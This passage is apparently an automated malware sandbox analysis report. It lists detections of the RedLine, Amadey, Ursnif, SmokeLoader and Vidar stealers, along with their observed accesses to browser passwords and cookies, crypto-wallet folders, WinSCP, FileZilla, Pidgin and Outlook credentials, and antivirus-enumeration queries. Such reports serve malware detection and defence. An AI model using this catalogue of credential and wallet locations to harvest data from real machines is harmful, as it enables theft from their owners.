Source: explorer.exe, 00000001.00000000.301080177.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.268529743.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.326594831.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00418857 cpuid

Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00418C71 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00424B94 _free,_free,_free,GetTimeZoneInformation,_free,

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_0040B800 GetUserNameA,SetCurrentDirectoryA,RtlAllocateHeap,

Source: C:\Users\user\AppData\Local\Temp\A852.exe

Code function: 12_2_00405400 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

Source: C:\Users\user\AppData\Local\Temp\F771.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\F771.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\F771.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\F771.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\F771.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\F771.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B4A7.exe PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F771.exe PID: 5640, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED

Yara detected Ursnif

Source: Yara match	File source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5876, type: MEMORYSTR
Source: Yara match	File source: 11.3.cttgcew.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q4Z52wRd28.exe.970000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4Z52wRd28.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cttgcew.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q4Z52wRd28.exe.960e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.cttgcew.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rovwer.exe PID: 4852, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 36.2.EB2B.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.EB2B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.471247692.0000000000C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.519975927.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EB2B.exe PID: 5512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EB2B.exe PID: 5628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EB2B.exe PID: 5828, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Found many strings related to Crypto-Wallets (likely being stolen)

Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet
Source: F771.exe, 00000020.00000002.855319857.0000000002C0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wk-cjelfplplebdjjenllpjcblmjkfcffne\|JaxxxLiberty
Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: EB2B.exe, 0000001C.00000002.454935093.0000000000B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: F771.exe, 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets\default_wallet
Source: EB2B.exe, 00000024.00000002.578719399.00000000272D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??????
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Source: Yara match	File source: 00000024.00000002.522046166.000000000127B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.853522237.0000000002B2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: F771.exe PID: 5640, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.542369400.000000000070F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.533006922.000000000D292000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.466345682.00000000009C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.541178072.0000000000701000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.562231967.0000000000714000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B4A7.exe PID: 3080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F771.exe PID: 5640, type: MEMORYSTR

Yara detected Ursnif

Source: Yara match	File source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

